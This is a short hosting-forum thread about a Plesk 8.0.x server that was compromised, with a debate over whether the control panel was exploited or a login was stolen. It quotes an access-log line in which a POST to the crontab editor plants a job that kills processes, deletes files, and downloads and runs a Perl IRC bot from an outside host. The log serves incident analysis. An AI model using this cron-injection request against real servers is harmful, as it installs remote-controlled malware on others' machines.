Security Violation plesk 8.0.X

[stewartrose]

Just for interest..

Hacked through Plesk control panel.

httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

All the best from Alan

 

[atomicturtle]

Thats a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.

 

[stewartrose]

Hi atomicturtle,

Not quite, no one has access to the cp but me, and my passwords are very strong, the code given uploads data through the exploit..

all the best from Alan

 

[atomicturtle]

Then its possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.